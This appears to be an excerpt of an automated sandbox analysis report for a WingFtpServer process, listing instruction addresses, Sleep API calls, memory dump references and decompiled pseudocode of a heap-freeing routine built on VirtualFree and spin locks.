                                                                                                                                                                                                  0x03aa5bea
                                                                                                                                                                                                  0x03aa5bea
                                                                                                                                                                                                  0x03aa5bf2
                                                                                                                                                                                                  0x03aa5bf5
                                                                                                                                                                                                  0x03aa5bff
                                                                                                                                                                                                  0x03aa5bff
                                                                                                                                                                                                  0x03aa5c06
                                                                                                                                                                                                  0x03aa5c19
                                                                                                                                                                                                  0x03aa5c1d
                                                                                                                                                                                                  0x03aa5c23
                                                                                                                                                                                                  0x03aa5c3c
                                                                                                                                                                                                  0x03aa5c42
                                                                                                                                                                                                  0x03aa5c42
                                                                                                                                                                                                  0x03aa5c44
                                                                                                                                                                                                  0x03aa5c62
                                                                                                                                                                                                  0x03aa5c46
                                                                                                                                                                                                  0x03aa5c46
                                                                                                                                                                                                  0x03aa5c4b
                                                                                                                                                                                                  0x03aa5c4d
                                                                                                                                                                                                  0x03aa5c52
                                                                                                                                                                                                  0x03aa5c5b
                                                                                                                                                                                                  0x03aa5c5b
                                                                                                                                                                                                  0x03aa5c67
                                                                                                                                                                                                  0x03aa5c6f
                                                                                                                                                                                                  0x03aa5c25
                                                                                                                                                                                                  0x03aa5c25
                                                                                                                                                                                                  0x03aa5c2f
                                                                                                                                                                                                  0x03aa5c37
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5c37
                                                                                                                                                                                                  0x03aa5c08
                                                                                                                                                                                                  0x03aa5c0b
                                                                                                                                                                                                  0x03aa5c0e
                                                                                                                                                                                                  0x03aa5c70
                                                                                                                                                                                                  0x03aa5c70
                                                                                                                                                                                                  0x03aa5c71
                                                                                                                                                                                                  0x03aa5c72
                                                                                                                                                                                                  0x03aa5c79
                                                                                                                                                                                                  0x03aa5c7c
                                                                                                                                                                                                  0x03aa5c7f
                                                                                                                                                                                                  0x03aa5c82
                                                                                                                                                                                                  0x03aa5c84
                                                                                                                                                                                                  0x03aa5c86
                                                                                                                                                                                                  0x03aa5c8d
                                                                                                                                                                                                  0x03aa5c8f
                                                                                                                                                                                                  0x03aa5c8f
                                                                                                                                                                                                  0x03aa5c8f
                                                                                                                                                                                                  0x03aa5c96
                                                                                                                                                                                                  0x03aa5c98
                                                                                                                                                                                                  0x03aa5c98
                                                                                                                                                                                                  0x03aa5c96
                                                                                                                                                                                                  0x03aa5ca4
                                                                                                                                                                                                  0x03aa5ca9
                                                                                                                                                                                                  0x03aa5ca9
                                                                                                                                                                                                  0x03aa5cab
                                                                                                                                                                                                  0x03aa5ccc
                                                                                                                                                                                                  0x03aa5ccc
                                                                                                                                                                                                  0x03aa5ccc
                                                                                                                                                                                                  0x03aa5cad
                                                                                                                                                                                                  0x03aa5cad
                                                                                                                                                                                                  0x03aa5cb3
                                                                                                                                                                                                  0x03aa5cb6
                                                                                                                                                                                                  0x03aa5cba
                                                                                                                                                                                                  0x03aa5cc0
                                                                                                                                                                                                  0x03aa5cc2
                                                                                                                                                                                                  0x03aa5cc2
                                                                                                                                                                                                  0x03aa5cc0
                                                                                                                                                                                                  0x03aa5cd1
                                                                                                                                                                                                  0x03aa5cd4
                                                                                                                                                                                                  0x03aa5cd7
                                                                                                                                                                                                  0x03aa5ce3
                                                                                                                                                                                                  0x03aa5ce3
                                                                                                                                                                                                  0x03aa5c06
                                                                                                                                                                                                  0x03aa5984
                                                                                                                                                                                                  0x03aa5984
                                                                                                                                                                                                  0x03aa5986
                                                                                                                                                                                                  0x03aa5986
                                                                                                                                                                                                  0x03aa598d
                                                                                                                                                                                                  0x03aa5994
                                                                                                                                                                                                  0x03aa59ec
                                                                                                                                                                                                  0x03aa59ec
                                                                                                                                                                                                  0x03aa59f1
                                                                                                                                                                                                  0x03aa59f5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa59f7
                                                                                                                                                                                                  0x03aa59f7
                                                                                                                                                                                                  0x03aa59fa
                                                                                                                                                                                                  0x03aa59ff
                                                                                                                                                                                                  0x03aa5a03
                                                                                                                                                                                                  0x03aa5a05
                                                                                                                                                                                                  0x03aa5a05
                                                                                                                                                                                                  0x03aa5a08
                                                                                                                                                                                                  0x03aa5a0d
                                                                                                                                                                                                  0x03aa5a11
                                                                                                                                                                                                  0x03aa5a13
                                                                                                                                                                                                  0x03aa5a16
                                                                                                                                                                                                  0x03aa5a18
                                                                                                                                                                                                  0x03aa5a1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a21
                                                                                                                                                                                                  0x03aa5a23
                                                                                                                                                                                                  0x03aa5a28
                                                                                                                                                                                                  0x03aa5a2d
                                                                                                                                                                                                  0x03aa5a31
                                                                                                                                                                                                  0x03aa5a39
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a39
                                                                                                                                                                                                  0x03aa5a31
                                                                                                                                                                                                  0x03aa5a1f
                                                                                                                                                                                                  0x03aa5a11
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a03
                                                                                                                                                                                                  0x03aa59ec
                                                                                                                                                                                                  0x03aa5996
                                                                                                                                                                                                  0x03aa5996
                                                                                                                                                                                                  0x03aa5999
                                                                                                                                                                                                  0x03aa599c
                                                                                                                                                                                                  0x03aa59a1
                                                                                                                                                                                                  0x03aa59a3
                                                                                                                                                                                                  0x03aa59bc
                                                                                                                                                                                                  0x03aa59bf
                                                                                                                                                                                                  0x03aa59c3
                                                                                                                                                                                                  0x03aa59c5
                                                                                                                                                                                                  0x03aa59c8
                                                                                                                                                                                                  0x03aa5a40
                                                                                                                                                                                                  0x03aa5a41
                                                                                                                                                                                                  0x03aa5a42
                                                                                                                                                                                                  0x03aa5a49
                                                                                                                                                                                                  0x03aa5a4b
                                                                                                                                                                                                  0x03aa5a4b
                                                                                                                                                                                                  0x03aa5a50
                                                                                                                                                                                                  0x03aa5a58
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a5a
                                                                                                                                                                                                  0x03aa5a5c
                                                                                                                                                                                                  0x03aa5a63
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a65
                                                                                                                                                                                                  0x03aa5a67
                                                                                                                                                                                                  0x03aa5a6c
                                                                                                                                                                                                  0x03aa5a71
                                                                                                                                                                                                  0x03aa5a79
                                                                                                                                                                                                  0x03aa5a7d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a7d
                                                                                                                                                                                                  0x03aa5a79
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5a63
                                                                                                                                                                                                  0x03aa5a4b
                                                                                                                                                                                                  0x03aa5a84
                                                                                                                                                                                                  0x03aa5a88
                                                                                                                                                                                                  0x03aa5a88
                                                                                                                                                                                                  0x03aa5a8e
                                                                                                                                                                                                  0x03aa5b00
                                                                                                                                                                                                  0x03aa5b04
                                                                                                                                                                                                  0x03aa5b0a
                                                                                                                                                                                                  0x03aa5b0c
                                                                                                                                                                                                  0x03aa5b34
                                                                                                                                                                                                  0x03aa5b38
                                                                                                                                                                                                  0x03aa5b3a
                                                                                                                                                                                                  0x03aa5b3f
                                                                                                                                                                                                  0x03aa5b41
                                                                                                                                                                                                  0x03aa5b43
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5b45
                                                                                                                                                                                                  0x03aa5b45
                                                                                                                                                                                                  0x03aa5b4a
                                                                                                                                                                                                  0x03aa5b4c
                                                                                                                                                                                                  0x03aa5b4d
                                                                                                                                                                                                  0x03aa5b4e
                                                                                                                                                                                                  0x03aa5b4f
                                                                                                                                                                                                  0x03aa5b4f
                                                                                                                                                                                                  0x03aa5b0e
                                                                                                                                                                                                  0x03aa5b0e
                                                                                                                                                                                                  0x03aa5b14
                                                                                                                                                                                                  0x03aa5b18
                                                                                                                                                                                                  0x03aa5b1e
                                                                                                                                                                                                  0x03aa5b20
                                                                                                                                                                                                  0x03aa5b22
                                                                                                                                                                                                  0x03aa5b22
                                                                                                                                                                                                  0x03aa5b24
                                                                                                                                                                                                  0x03aa5b26
                                                                                                                                                                                                  0x03aa5b2c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5b2c
                                                                                                                                                                                                  0x03aa5a90
                                                                                                                                                                                                  0x03aa5a90
                                                                                                                                                                                                  0x03aa5a93
                                                                                                                                                                                                  0x03aa5a9a
                                                                                                                                                                                                  0x03aa5aa1
                                                                                                                                                                                                  0x03aa5aa4
                                                                                                                                                                                                  0x03aa5aa7
                                                                                                                                                                                                  0x03aa5aae
                                                                                                                                                                                                  0x03aa5ab1
                                                                                                                                                                                                  0x03aa5ab4
                                                                                                                                                                                                  0x03aa5ab7
                                                                                                                                                                                                  0x03aa5ab9
                                                                                                                                                                                                  0x03aa5abb
                                                                                                                                                                                                  0x03aa5abd
                                                                                                                                                                                                  0x03aa5ac2
                                                                                                                                                                                                  0x03aa5ac4
                                                                                                                                                                                                  0x03aa5ac4
                                                                                                                                                                                                  0x03aa5ac4
                                                                                                                                                                                                  0x03aa5acb
                                                                                                                                                                                                  0x03aa5acd
                                                                                                                                                                                                  0x03aa5acd
                                                                                                                                                                                                  0x03aa5acb
                                                                                                                                                                                                  0x03aa5ad4
                                                                                                                                                                                                  0x03aa5ad9
                                                                                                                                                                                                  0x03aa5adc
                                                                                                                                                                                                  0x03aa5ae2
                                                                                                                                                                                                  0x03aa5b50
                                                                                                                                                                                                  0x03aa5b50
                                                                                                                                                                                                  0x03aa5b50
                                                                                                                                                                                                  0x03aa5ae4
                                                                                                                                                                                                  0x03aa5ae4
                                                                                                                                                                                                  0x03aa5ae6
                                                                                                                                                                                                  0x03aa5aea
                                                                                                                                                                                                  0x03aa5aec
                                                                                                                                                                                                  0x03aa5aef
                                                                                                                                                                                                  0x03aa5af2
                                                                                                                                                                                                  0x03aa5af5
                                                                                                                                                                                                  0x03aa5af9
                                                                                                                                                                                                  0x03aa5af9
                                                                                                                                                                                                  0x03aa5b55
                                                                                                                                                                                                  0x03aa5b55
                                                                                                                                                                                                  0x03aa5b55
                                                                                                                                                                                                  0x03aa5b58
                                                                                                                                                                                                  0x03aa5b5b
                                                                                                                                                                                                  0x03aa5b5d
                                                                                                                                                                                                  0x03aa5b62
                                                                                                                                                                                                  0x03aa5b64
                                                                                                                                                                                                  0x03aa5b67
                                                                                                                                                                                                  0x03aa5b6e
                                                                                                                                                                                                  0x03aa5b71
                                                                                                                                                                                                  0x03aa5b71
                                                                                                                                                                                                  0x03aa5b74
                                                                                                                                                                                                  0x03aa5b78
                                                                                                                                                                                                  0x03aa5b7b
                                                                                                                                                                                                  0x03aa5b7e
                                                                                                                                                                                                  0x03aa5b80
                                                                                                                                                                                                  0x03aa5b80
                                                                                                                                                                                                  0x03aa5b82
                                                                                                                                                                                                  0x03aa5b85
                                                                                                                                                                                                  0x03aa5b88
                                                                                                                                                                                                  0x03aa5b8b
                                                                                                                                                                                                  0x03aa5b8c
                                                                                                                                                                                                  0x03aa5b8d
                                                                                                                                                                                                  0x03aa5b8e
                                                                                                                                                                                                  0x03aa5b8e
                                                                                                                                                                                                  0x03aa59ca
                                                                                                                                                                                                  0x03aa59ca
                                                                                                                                                                                                  0x03aa59ca
                                                                                                                                                                                                  0x03aa59ca
                                                                                                                                                                                                  0x03aa59ce
                                                                                                                                                                                                  0x03aa59d1
                                                                                                                                                                                                  0x03aa59d4
                                                                                                                                                                                                  0x03aa59d7
                                                                                                                                                                                                  0x03aa59d8
                                                                                                                                                                                                  0x03aa59d8
                                                                                                                                                                                                  0x03aa59a5
                                                                                                                                                                                                  0x03aa59a5
                                                                                                                                                                                                  0x03aa59a9
                                                                                                                                                                                                  0x03aa59a9
                                                                                                                                                                                                  0x03aa59ac
                                                                                                                                                                                                  0x03aa59af
                                                                                                                                                                                                  0x03aa59b2
                                                                                                                                                                                                  0x03aa59dc
                                                                                                                                                                                                  0x03aa59df
                                                                                                                                                                                                  0x03aa59e2
                                                                                                                                                                                                  0x03aa59e5
                                                                                                                                                                                                  0x03aa59e8
                                                                                                                                                                                                  0x03aa59e9
                                                                                                                                                                                                  0x03aa59b4
                                                                                                                                                                                                  0x03aa59b4
                                                                                                                                                                                                  0x03aa59b7
                                                                                                                                                                                                  0x03aa59b8
                                                                                                                                                                                                  0x03aa59b8
                                                                                                                                                                                                  0x03aa59b2
                                                                                                                                                                                                  0x03aa59a3

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,000000FF,03AA620C,00000000,03AAE153,00000000,03AAE699,00000000,03AAE95B,00000000,03AAE991), ref: 03AA5A23
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,000000FF,03AA620C,00000000,03AAE153,00000000,03AAE699,00000000,03AAE95B,00000000,03AAE991), ref: 03AA5A39
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00000000,?,000000FF,03AA620C,00000000,03AAE153,00000000,03AAE699,00000000,03AAE95B,00000000,03AAE991), ref: 03AA5A67
                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,03AA620C,00000000,03AAE153,00000000,03AAE699,00000000,03AAE95B,00000000,03AAE991), ref: 03AA5A7D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                                                  • String ID: @.
                                                                                                                                                                                                  • API String ID: 3472027048-4201455939
                                                                                                                                                                                                  • Opcode ID: 93b54ee2f1893a9c15568d02bdad5edf0f9e65074126b3213a75f7db2b83726c
                                                                                                                                                                                                  • Instruction ID: 34f6e7d4b93dbf4932ff507dd7b2b1156cad623a4a81a339296b8b541c23281c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93b54ee2f1893a9c15568d02bdad5edf0f9e65074126b3213a75f7db2b83726c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CC15777A02B118FC719DF2CD59431AFBE0AB86314F0981AFD4998F78AE3709454CB85
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA5CF0 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                                                  			E03AA5CF0(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x3bd305d; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E03AA56CC();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								if(VirtualFree(_t103, 0, 0x8000) == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x3bd5b7c = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x3bd398d;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x3bd305d; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x3bd3aec], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x3bd398d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x3bd3aec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E03AA5544(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E03AA5544(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x3bd3af4 - 0x13ffe0;
							if( *0x3bd3af4 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E03AA55E4(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x3bd3af4 = 0x13ffe0;
								 *0x3bd3af0 = _t82;
								 *0x3bd3aec = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x3bd3aec = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E03AA5584(_t106, _t88, _t81);
							 *0x3bd3aec = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}




























                                                                                                                                                                                                  0x03aa5cf0
                                                                                                                                                                                                  0x03aa5cf0
                                                                                                                                                                                                  0x03aa5cf9
                                                                                                                                                                                                  0x03aa5cff
                                                                                                                                                                                                  0x03aa5de8
                                                                                                                                                                                                  0x03aa5deb
                                                                                                                                                                                                  0x03aa5ed8
                                                                                                                                                                                                  0x03aa5ed9
                                                                                                                                                                                                  0x03aa5edc
                                                                                                                                                                                                  0x03aa577c
                                                                                                                                                                                                  0x03aa577e
                                                                                                                                                                                                  0x03aa5780
                                                                                                                                                                                                  0x03aa5785
                                                                                                                                                                                                  0x03aa5788
                                                                                                                                                                                                  0x03aa578d
                                                                                                                                                                                                  0x03aa5791
                                                                                                                                                                                                  0x03aa5797
                                                                                                                                                                                                  0x03aa579b
                                                                                                                                                                                                  0x03aa57a1
                                                                                                                                                                                                  0x03aa57bd
                                                                                                                                                                                                  0x03aa57c1
                                                                                                                                                                                                  0x03aa57c4
                                                                                                                                                                                                  0x03aa57c4
                                                                                                                                                                                                  0x03aa57c6
                                                                                                                                                                                                  0x03aa57ce
                                                                                                                                                                                                  0x03aa57db
                                                                                                                                                                                                  0x03aa57e0
                                                                                                                                                                                                  0x03aa57e2
                                                                                                                                                                                                  0x03aa57e4
                                                                                                                                                                                                  0x03aa57e7
                                                                                                                                                                                                  0x03aa57e7
                                                                                                                                                                                                  0x03aa57e9
                                                                                                                                                                                                  0x03aa57ed
                                                                                                                                                                                                  0x03aa57ef
                                                                                                                                                                                                  0x03aa57f1
                                                                                                                                                                                                  0x03aa57f3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa57f3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa57ef
                                                                                                                                                                                                  0x03aa57a3
                                                                                                                                                                                                  0x03aa57b2
                                                                                                                                                                                                  0x03aa57b8
                                                                                                                                                                                                  0x03aa57b4
                                                                                                                                                                                                  0x03aa57b4
                                                                                                                                                                                                  0x03aa57b4
                                                                                                                                                                                                  0x03aa57b2
                                                                                                                                                                                                  0x03aa57f7
                                                                                                                                                                                                  0x03aa57f9
                                                                                                                                                                                                  0x03aa5802
                                                                                                                                                                                                  0x03aa580b
                                                                                                                                                                                                  0x03aa580b
                                                                                                                                                                                                  0x03aa580e
                                                                                                                                                                                                  0x03aa581e
                                                                                                                                                                                                  0x03aa5ee2
                                                                                                                                                                                                  0x03aa5ee7
                                                                                                                                                                                                  0x03aa5ee7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5d05
                                                                                                                                                                                                  0x03aa5d05
                                                                                                                                                                                                  0x03aa5d07
                                                                                                                                                                                                  0x03aa5d09
                                                                                                                                                                                                  0x03aa5d6c
                                                                                                                                                                                                  0x03aa5d6c
                                                                                                                                                                                                  0x03aa5d71
                                                                                                                                                                                                  0x03aa5d75
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5d77
                                                                                                                                                                                                  0x03aa5d79
                                                                                                                                                                                                  0x03aa5d80
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5d82
                                                                                                                                                                                                  0x03aa5d86
                                                                                                                                                                                                  0x03aa5d8b
                                                                                                                                                                                                  0x03aa5d8c
                                                                                                                                                                                                  0x03aa5d8d
                                                                                                                                                                                                  0x03aa5d92
                                                                                                                                                                                                  0x03aa5d96
                                                                                                                                                                                                  0x03aa5da0
                                                                                                                                                                                                  0x03aa5da5
                                                                                                                                                                                                  0x03aa5da6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5da6
                                                                                                                                                                                                  0x03aa5d96
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5d80
                                                                                                                                                                                                  0x03aa5d6c
                                                                                                                                                                                                  0x03aa5d0b
                                                                                                                                                                                                  0x03aa5d0b
                                                                                                                                                                                                  0x03aa5d0b
                                                                                                                                                                                                  0x03aa5d0b
                                                                                                                                                                                                  0x03aa5d0f
                                                                                                                                                                                                  0x03aa5d12
                                                                                                                                                                                                  0x03aa5d40
                                                                                                                                                                                                  0x03aa5d42
                                                                                                                                                                                                  0x03aa5d57
                                                                                                                                                                                                  0x03aa5d57
                                                                                                                                                                                                  0x03aa5d44
                                                                                                                                                                                                  0x03aa5d44
                                                                                                                                                                                                  0x03aa5d47
                                                                                                                                                                                                  0x03aa5d4a
                                                                                                                                                                                                  0x03aa5d4d
                                                                                                                                                                                                  0x03aa5d50
                                                                                                                                                                                                  0x03aa5d52
                                                                                                                                                                                                  0x03aa5d55
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5d55
                                                                                                                                                                                                  0x03aa5d5a
                                                                                                                                                                                                  0x03aa5d5c
                                                                                                                                                                                                  0x03aa5d5e
                                                                                                                                                                                                  0x03aa5d61
                                                                                                                                                                                                  0x03aa5df1
                                                                                                                                                                                                  0x03aa5df4
                                                                                                                                                                                                  0x03aa5df6
                                                                                                                                                                                                  0x03aa5df8
                                                                                                                                                                                                  0x03aa5df9
                                                                                                                                                                                                  0x03aa5dfb
                                                                                                                                                                                                  0x03aa5dac
                                                                                                                                                                                                  0x03aa5dac
                                                                                                                                                                                                  0x03aa5db1
                                                                                                                                                                                                  0x03aa5db9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5dbb
                                                                                                                                                                                                  0x03aa5dbd
                                                                                                                                                                                                  0x03aa5dc4
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5dc6
                                                                                                                                                                                                  0x03aa5dc8
                                                                                                                                                                                                  0x03aa5dcd
                                                                                                                                                                                                  0x03aa5dd2
                                                                                                                                                                                                  0x03aa5dda
                                                                                                                                                                                                  0x03aa5dde
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5dde
                                                                                                                                                                                                  0x03aa5dda
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03aa5dc4
                                                                                                                                                                                                  0x03aa5dac
                                                                                                                                                                                                  0x03aa5dfd
                                                                                                                                                                                                  0x03aa5dfd
                                                                                                                                                                                                  0x03aa5e05
                                                                                                                                                                                                  0x03aa5e09
                                                                                                                                                                                                  0x03aa5e40
                                                                                                                                                                                                  0x03aa5e43
                                                                                                                                                                                                  0x03aa5e46
                                                                                                                                                                                                  0x03aa5e48
                                                                                                                                                                                                  0x03aa5e4e
                                                                                                                                                                                                  0x03aa5e50
                                                                                                                                                                                                  0x03aa5e50
                                                                                                                                                                                                  0x03aa5e0b
                                                                                                                                                                                                  0x03aa5e0b
                                                                                                                                                                                                  0x03aa5e0b
                                                                                                                                                                                                  0x03aa5e0e
                                                                                                                                                                                                  0x03aa5e0e
                                                                                                                                                                                                  0x03aa5e12
                                                                                                                                                                                                  0x03aa5e16
                                                                                                                                                                                                  0x03aa5e58
                                                                                                                                                                                                  0x03aa5e5b
                                                                                                                                                                                                  0x03aa5e5d
                                                                                                                                                                                                  0x03aa5e5f
                                                                                                                                                                                                  0x03aa5e65
                                                                                                                                                                                                  0x03aa5e69
                                                                                                                                                                                                  0x03aa5e69
                                                                                                                                                                                                  0x03aa5e65
                                                                                                                                                                                                  0x03aa5e18
                                                                                                                                                                                                  0x03aa5e1e
                                                                                                                                                                                                  0x03aa5e70
                                                                                                                                                                                                  0x03aa5e7a
                                                                                                                                                                                                  0x03aa5ea8
                                                                                                                                                                                                  0x03aa5eae
                                                                                                                                                                                                  0x03aa5eb3
